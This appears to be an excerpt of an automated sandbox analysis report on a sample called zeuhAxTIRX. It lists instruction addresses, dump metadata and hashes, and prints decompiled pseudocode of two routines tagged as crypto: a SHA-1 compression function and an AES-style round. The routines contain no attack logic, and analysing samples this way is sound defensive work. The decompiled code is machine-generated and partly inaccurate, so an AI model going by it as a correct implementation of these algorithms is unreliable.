                                                                                                                0x00e5c36a
                                                                                                                0x00e5c370
                                                                                                                0x00e5c383
                                                                                                                0x00e5c38a
                                                                                                                0x00e5c38d
                                                                                                                0x00e5c390
                                                                                                                0x00e5c393
                                                                                                                0x00e5c39c
                                                                                                                0x00e5c39f
                                                                                                                0x00e5c3b2
                                                                                                                0x00e5c3b5
                                                                                                                0x00e5c3bf
                                                                                                                0x00e5c3c2
                                                                                                                0x00e5c3c4
                                                                                                                0x00e5c3cd
                                                                                                                0x00e5c3d0
                                                                                                                0x00e5c3e3
                                                                                                                0x00e5c3e9
                                                                                                                0x00e5c3ec
                                                                                                                0x00e5c3f3
                                                                                                                0x00e5c3f5
                                                                                                                0x00e5c3f8
                                                                                                                0x00e5c3fb
                                                                                                                0x00e5c3fe
                                                                                                                0x00e5c401
                                                                                                                0x00e5c404
                                                                                                                0x00e5c40d
                                                                                                                0x00e5c412
                                                                                                                0x00e5c415
                                                                                                                0x00e5c415
                                                                                                                0x00e5c428
                                                                                                                0x00e5c42b
                                                                                                                0x00e5c42e
                                                                                                                0x00e5c435
                                                                                                                0x00e5c438
                                                                                                                0x00e5c43b
                                                                                                                0x00e5c43e
                                                                                                                0x00e5c451
                                                                                                                0x00e5c454
                                                                                                                0x00e5c45f
                                                                                                                0x00e5c462
                                                                                                                0x00e5c46e
                                                                                                                0x00e5c471
                                                                                                                0x00e5c477
                                                                                                                0x00e5c47a
                                                                                                                0x00e5c47d
                                                                                                                0x00e5c484
                                                                                                                0x00e5c494
                                                                                                                0x00e5c497
                                                                                                                0x00e5c49d
                                                                                                                0x00e5c4a0
                                                                                                                0x00e5c4a7
                                                                                                                0x00e5c4a9
                                                                                                                0x00e5c4ac
                                                                                                                0x00e5c4af
                                                                                                                0x00e5c4b2
                                                                                                                0x00e5c4b5
                                                                                                                0x00e5c4bc
                                                                                                                0x00e5c4cb
                                                                                                                0x00e5c4ce
                                                                                                                0x00e5c4d5
                                                                                                                0x00e5c4d8
                                                                                                                0x00e5c4db
                                                                                                                0x00e5c4de
                                                                                                                0x00e5c4e1
                                                                                                                0x00e5c4e4
                                                                                                                0x00e5c4e7
                                                                                                                0x00e5c4f0
                                                                                                                0x00e5c501
                                                                                                                0x00e5c509
                                                                                                                0x00e5c50f
                                                                                                                0x00e5c512
                                                                                                                0x00e5c514
                                                                                                                0x00e5c517
                                                                                                                0x00e5c51a
                                                                                                                0x00e5c527

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (
                                                                                                                • API String ID: 0-3887548279
                                                                                                                • Opcode ID: 510b793350833397b8132a7666fabf66f8d5f1776480709b71e03841eb83c365
                                                                                                                • Instruction ID: 703666f298eb49c4e6d93881f43f62579da044d5f70e02f220af561600e42823
                                                                                                                • Opcode Fuzzy Hash: 510b793350833397b8132a7666fabf66f8d5f1776480709b71e03841eb83c365
                                                                                                                • Instruction Fuzzy Hash: 5D021CB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E5BFE3 Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00E5BFE3(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed int* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t400;
				signed int _t405;
				signed int _t411;
				signed int _t414;
				signed int _t421;
				signed int _t424;
				signed int _t433;
				signed int _t435;
				signed int _t438;
				signed int _t446;
				signed int _t448;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x45
				_t277 = _t2;
				do {
					_push(_t277);
					 *_t448 =  *_t448 - 1;
					 *(_t536 + _t353 * 4 - 0x14c) = ((0x00000038 << 0x00000008 | _t448) << 0x00000008 | _t277[0] & 0x000000ff) << 0x00000008 | _t277[0] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[0] & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					_t448 = _t277[3] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[2] & 0x000000ff) << 0x00000008 | _t277[3] & 0x000000ff) << 0x00000008 | _t277[3] & 0x000000ff) << 0x00000008 | _t448;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[4]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t400 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t400;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t400;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t405 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t405 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t405;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t411 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t411;
					asm("rol edx, 0x5");
					_t285 = _t411 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t414 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t414 & _t325 | _t362 & _t414) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t414;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t414 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t405 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t405;
					_t502 = _t499 + (_t405 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t421 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t421;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t421 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t424 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9ebc9
					_t506 = _t292 + (_t334 ^ _v8 ^ _t424) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t424;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t405 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t405;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t405 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t433 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t433;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t435 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t433 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t435;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t435 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t438 = _t369;
					_t358 = _v12;
					_v8 = _t438;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t438 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t405 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t405 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t405;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t446 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t446;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t446 + _v16 - 0x359d3e2a;
					_t405 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t405) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t405 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t405;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t405;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

































































                                                                                                                0x00e5bfee
                                                                                                                0x00e5bff2
                                                                                                                0x00e5bff4
                                                                                                                0x00e5bff4
                                                                                                                0x00e5bff7
                                                                                                                0x00e5bff9
                                                                                                                0x00e5bffa
                                                                                                                0x00e5c019
                                                                                                                0x00e5c03f
                                                                                                                0x00e5c065
                                                                                                                0x00e5c07e
                                                                                                                0x00e5c087
                                                                                                                0x00e5c08e
                                                                                                                0x00e5c091
                                                                                                                0x00e5c094
                                                                                                                0x00e5c09d
                                                                                                                0x00e5c0a3
                                                                                                                0x00e5c0aa
                                                                                                                0x00e5c0bb
                                                                                                                0x00e5c0be
                                                                                                                0x00e5c0c1
                                                                                                                0x00e5c0c5
                                                                                                                0x00e5c0c7
                                                                                                                0x00e5c0c9
                                                                                                                0x00e5c0d2
                                                                                                                0x00e5c0d5
                                                                                                                0x00e5c0d8
                                                                                                                0x00e5c0e3
                                                                                                                0x00e5c0e9
                                                                                                                0x00e5c0eb
                                                                                                                0x00e5c0eb
                                                                                                                0x00e5c0ee
                                                                                                                0x00e5c0f1
                                                                                                                0x00e5c0f1
                                                                                                                0x00e5c0f6
                                                                                                                0x00e5c0f8
                                                                                                                0x00e5c0fb
                                                                                                                0x00e5c0fe
                                                                                                                0x00e5c104
                                                                                                                0x00e5c107
                                                                                                                0x00e5c10a
                                                                                                                0x00e5c113
                                                                                                                0x00e5c119
                                                                                                                0x00e5c122
                                                                                                                0x00e5c131
                                                                                                                0x00e5c138
                                                                                                                0x00e5c13b
                                                                                                                0x00e5c13e
                                                                                                                0x00e5c147
                                                                                                                0x00e5c14a
                                                                                                                0x00e5c14d
                                                                                                                0x00e5c165
                                                                                                                0x00e5c16c
                                                                                                                0x00e5c16e
                                                                                                                0x00e5c171
                                                                                                                0x00e5c174
                                                                                                                0x00e5c17d
                                                                                                                0x00e5c184
                                                                                                                0x00e5c187
                                                                                                                0x00e5c18a
                                                                                                                0x00e5c199
                                                                                                                0x00e5c1a0
                                                                                                                0x00e5c1a3
                                                                                                                0x00e5c1a6
                                                                                                                0x00e5c1af
                                                                                                                0x00e5c1b9
                                                                                                                0x00e5c1bc
                                                                                                                0x00e5c1c8
                                                                                                                0x00e5c1cb
                                                                                                                0x00e5c1d2
                                                                                                                0x00e5c1d5
                                                                                                                0x00e5c1d8
                                                                                                                0x00e5c1dd
                                                                                                                0x00e5c1e0
                                                                                                                0x00e5c1e9
                                                                                                                0x00e5c1fa
                                                                                                                0x00e5c1fd
                                                                                                                0x00e5c200
                                                                                                                0x00e5c207
                                                                                                                0x00e5c20a
                                                                                                                0x00e5c20d
                                                                                                                0x00e5c210
                                                                                                                0x00e5c212
                                                                                                                0x00e5c215
                                                                                                                0x00e5c218
                                                                                                                0x00e5c221
                                                                                                                0x00e5c226
                                                                                                                0x00e5c226
                                                                                                                0x00e5c23b
                                                                                                                0x00e5c23e
                                                                                                                0x00e5c241
                                                                                                                0x00e5c248
                                                                                                                0x00e5c24b
                                                                                                                0x00e5c24e
                                                                                                                0x00e5c263
                                                                                                                0x00e5c26a
                                                                                                                0x00e5c26d
                                                                                                                0x00e5c271
                                                                                                                0x00e5c274
                                                                                                                0x00e5c279
                                                                                                                0x00e5c27c
                                                                                                                0x00e5c28b
                                                                                                                0x00e5c28e
                                                                                                                0x00e5c295
                                                                                                                0x00e5c298
                                                                                                                0x00e5c29b
                                                                                                                0x00e5c29e
                                                                                                                0x00e5c2a1
                                                                                                                0x00e5c2a9
                                                                                                                0x00e5c2b7
                                                                                                                0x00e5c2ba
                                                                                                                0x00e5c2bd
                                                                                                                0x00e5c2bd
                                                                                                                0x00e5c2c4
                                                                                                                0x00e5c2c7
                                                                                                                0x00e5c2ca
                                                                                                                0x00e5c2d2
                                                                                                                0x00e5c2e0
                                                                                                                0x00e5c2e3
                                                                                                                0x00e5c2ea
                                                                                                                0x00e5c2ed
                                                                                                                0x00e5c2f0
                                                                                                                0x00e5c2f3
                                                                                                                0x00e5c2f6
                                                                                                                0x00e5c2ff
                                                                                                                0x00e5c306
                                                                                                                0x00e5c306
                                                                                                                0x00e5c30c
                                                                                                                0x00e5c325
                                                                                                                0x00e5c328
                                                                                                                0x00e5c32f
                                                                                                                0x00e5c332
                                                                                                                0x00e5c335
                                                                                                                0x00e5c347
                                                                                                                0x00e5c351
                                                                                                                0x00e5c354
                                                                                                                0x00e5c35d
                                                                                                                0x00e5c360
                                                                                                                0x00e5c367
                                                                                                                0x00e5c36a
                                                                                                                0x00e5c370
                                                                                                                0x00e5c383
                                                                                                                0x00e5c38a
                                                                                                                0x00e5c38d
                                                                                                                0x00e5c390
                                                                                                                0x00e5c393
                                                                                                                0x00e5c39c
                                                                                                                0x00e5c39f
                                                                                                                0x00e5c3b2
                                                                                                                0x00e5c3b5
                                                                                                                0x00e5c3bf
                                                                                                                0x00e5c3c2
                                                                                                                0x00e5c3c4
                                                                                                                0x00e5c3cd
                                                                                                                0x00e5c3d0
                                                                                                                0x00e5c3e3
                                                                                                                0x00e5c3e9
                                                                                                                0x00e5c3ec
                                                                                                                0x00e5c3f3
                                                                                                                0x00e5c3f5
                                                                                                                0x00e5c3f8
                                                                                                                0x00e5c3fb
                                                                                                                0x00e5c3fe
                                                                                                                0x00e5c401
                                                                                                                0x00e5c404
                                                                                                                0x00e5c40d
                                                                                                                0x00e5c412
                                                                                                                0x00e5c415
                                                                                                                0x00e5c415
                                                                                                                0x00e5c428
                                                                                                                0x00e5c42b
                                                                                                                0x00e5c42e
                                                                                                                0x00e5c435
                                                                                                                0x00e5c438
                                                                                                                0x00e5c43b
                                                                                                                0x00e5c43e
                                                                                                                0x00e5c451
                                                                                                                0x00e5c454
                                                                                                                0x00e5c45f
                                                                                                                0x00e5c462
                                                                                                                0x00e5c46e
                                                                                                                0x00e5c471
                                                                                                                0x00e5c477
                                                                                                                0x00e5c47a
                                                                                                                0x00e5c47d
                                                                                                                0x00e5c484
                                                                                                                0x00e5c494
                                                                                                                0x00e5c497
                                                                                                                0x00e5c49d
                                                                                                                0x00e5c4a0
                                                                                                                0x00e5c4a7
                                                                                                                0x00e5c4a9
                                                                                                                0x00e5c4ac
                                                                                                                0x00e5c4af
                                                                                                                0x00e5c4b2
                                                                                                                0x00e5c4b5
                                                                                                                0x00e5c4bc
                                                                                                                0x00e5c4cb
                                                                                                                0x00e5c4ce
                                                                                                                0x00e5c4d5
                                                                                                                0x00e5c4d8
                                                                                                                0x00e5c4db
                                                                                                                0x00e5c4de
                                                                                                                0x00e5c4e1
                                                                                                                0x00e5c4e4
                                                                                                                0x00e5c4e7
                                                                                                                0x00e5c4f0
                                                                                                                0x00e5c501
                                                                                                                0x00e5c509
                                                                                                                0x00e5c50f
                                                                                                                0x00e5c512
                                                                                                                0x00e5c514
                                                                                                                0x00e5c517
                                                                                                                0x00e5c51a
                                                                                                                0x00e5c527

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (
                                                                                                                • API String ID: 0-3887548279
                                                                                                                • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                • Instruction ID: 70c5d2c63fa01a081d41fa1c683ef4bc5a6f95072943e83cfcac300159438fc3
                                                                                                                • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                • Instruction Fuzzy Hash: 25021CB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E55823 Relevance: .4, Instructions: 435COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 26%
                                                                                                                			E00E55823(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
